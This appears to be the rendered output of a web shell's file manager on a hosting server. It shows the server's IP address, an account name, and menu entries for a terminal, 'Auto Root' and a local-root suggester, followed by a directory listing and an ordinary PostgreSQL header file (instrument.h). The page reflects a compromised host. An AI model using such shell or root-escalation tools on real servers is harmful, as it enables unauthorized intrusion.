Linux server.edchosting.com 4.18.0-553.79.1.lve.el7h.x86_64 #1 SMP Wed Oct 15 16:34:46 UTC 2025 x86_64
LiteSpeed
Server IP : 75.98.162.185 & Your IP : 216.73.216.163
Domains :
Cant Read [ /etc/named.conf ]
User : goons4good
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
include /
pgsql /
server /
executor /
Delete
Unzip
Name
Size
Permission
Date
Action
execdebug.h
4.32
KB
-rw-r--r--
2021-06-15 13:00
execdesc.h
2.33
KB
-rw-r--r--
2021-06-15 13:00
executor.h
14.56
KB
-rw-r--r--
2021-06-15 13:00
functions.h
1.12
KB
-rw-r--r--
2021-06-15 13:00
hashjoin.h
7.18
KB
-rw-r--r--
2021-06-15 13:00
instrument.h
2.79
KB
-rw-r--r--
2021-06-15 13:00
nodeAgg.h
782
B
-rw-r--r--
2021-06-15 13:00
nodeAppend.h
701
B
-rw-r--r--
2021-06-15 13:00
nodeBitmapAnd.h
738
B
-rw-r--r--
2021-06-15 13:00
nodeBitmapHeapscan.h
813
B
-rw-r--r--
2021-06-15 13:00
nodeBitmapIndexscan.h
822
B
-rw-r--r--
2021-06-15 13:00
nodeBitmapOr.h
724
B
-rw-r--r--
2021-06-15 13:00
nodeCtescan.h
715
B
-rw-r--r--
2021-06-15 13:00
nodeForeignscan.h
771
B
-rw-r--r--
2021-06-15 13:00
nodeFunctionscan.h
785
B
-rw-r--r--
2021-06-15 13:00
nodeGroup.h
716
B
-rw-r--r--
2021-06-15 13:00
nodeHash.h
1.88
KB
-rw-r--r--
2021-06-15 13:00
nodeHashjoin.h
890
B
-rw-r--r--
2021-06-15 13:00
nodeIndexonlyscan.h
920
B
-rw-r--r--
2021-06-15 13:00
nodeIndexscan.h
1.52
KB
-rw-r--r--
2021-06-15 13:00
nodeLimit.h
687
B
-rw-r--r--
2021-06-15 13:00
nodeLockRows.h
729
B
-rw-r--r--
2021-06-15 13:00
nodeMaterial.h
838
B
-rw-r--r--
2021-06-15 13:00
nodeMergeAppend.h
771
B
-rw-r--r--
2021-06-15 13:00
nodeMergejoin.h
743
B
-rw-r--r--
2021-06-15 13:00
nodeModifyTable.h
768
B
-rw-r--r--
2021-06-15 13:00
nodeNestloop.h
729
B
-rw-r--r--
2021-06-15 13:00
nodeRecursiveunion.h
813
B
-rw-r--r--
2021-06-15 13:00
nodeResult.h
802
B
-rw-r--r--
2021-06-15 13:00
nodeSeqscan.h
812
B
-rw-r--r--
2021-06-15 13:00
nodeSetOp.h
687
B
-rw-r--r--
2021-06-15 13:00
nodeSort.h
766
B
-rw-r--r--
2021-06-15 13:00
nodeSubplan.h
812
B
-rw-r--r--
2021-06-15 13:00
nodeSubqueryscan.h
785
B
-rw-r--r--
2021-06-15 13:00
nodeTidscan.h
812
B
-rw-r--r--
2021-06-15 13:00
nodeUnique.h
701
B
-rw-r--r--
2021-06-15 13:00
nodeValuesscan.h
866
B
-rw-r--r--
2021-06-15 13:00
nodeWindowAgg.h
776
B
-rw-r--r--
2021-06-15 13:00
nodeWorktablescan.h
799
B
-rw-r--r--
2021-06-15 13:00
spi.h
5.53
KB
-rw-r--r--
2021-06-15 13:00
spi_priv.h
3.61
KB
-rw-r--r--
2021-06-15 13:00
tstoreReceiver.h
767
B
-rw-r--r--
2021-06-15 13:00
tuptable.h
8.4
KB
-rw-r--r--
2021-06-15 13:00
Save
Rename
/*------------------------------------------------------------------------- * * instrument.h * definitions for run-time statistics collection * * * Copyright (c) 2001-2012, PostgreSQL Global Development Group * * src/include/executor/instrument.h * *------------------------------------------------------------------------- */ #ifndef INSTRUMENT_H #define INSTRUMENT_H #include "portability/instr_time.h" typedef struct BufferUsage { long shared_blks_hit; /* # of shared buffer hits */ long shared_blks_read; /* # of shared disk blocks read */ long shared_blks_dirtied; /* # of shared blocks dirtied */ long shared_blks_written; /* # of shared disk blocks written */ long local_blks_hit; /* # of local buffer hits */ long local_blks_read; /* # of local disk blocks read */ long local_blks_dirtied; /* # of shared blocks dirtied */ long local_blks_written; /* # of local disk blocks written */ long temp_blks_read; /* # of temp blocks read */ long temp_blks_written; /* # of temp blocks written */ instr_time blk_read_time; /* time spent reading */ instr_time blk_write_time; /* time spent writing */ } BufferUsage; /* Flag bits included in InstrAlloc's instrument_options bitmask */ typedef enum InstrumentOption { INSTRUMENT_TIMER = 1 << 0, /* needs timer (and row counts) */ INSTRUMENT_BUFFERS = 1 << 1, /* needs buffer usage */ INSTRUMENT_ROWS = 1 << 2, /* needs row count */ INSTRUMENT_ALL = 0x7FFFFFFF } InstrumentOption; typedef struct Instrumentation { /* Parameters set at node creation: */ bool need_timer; /* TRUE if we need timer data */ bool need_bufusage; /* TRUE if we need buffer usage data */ /* Info about current plan cycle: */ bool running; /* TRUE if we've completed first tuple */ instr_time starttime; /* Start time of current iteration of node */ instr_time counter; /* Accumulated runtime for this node */ double firsttuple; /* Time for first tuple of this cycle */ double tuplecount; /* Tuples emitted so far this cycle */ BufferUsage bufusage_start; /* Buffer usage at start */ /* Accumulated statistics across all completed cycles: */ double startup; /* Total startup time (in seconds) */ double total; /* Total total time (in seconds) */ double ntuples; /* Total tuples produced */ double nloops; /* # of run cycles for this node */ double nfiltered1; /* # tuples removed by scanqual or joinqual */ double nfiltered2; /* # tuples removed by "other" quals */ BufferUsage bufusage; /* Total buffer usage */ } Instrumentation; extern PGDLLIMPORT BufferUsage pgBufferUsage; extern Instrumentation *InstrAlloc(int n, int instrument_options); extern void InstrStartNode(Instrumentation *instr); extern void InstrStopNode(Instrumentation *instr, double nTuples); extern void InstrEndLoop(Instrumentation *instr); #endif /* INSTRUMENT_H */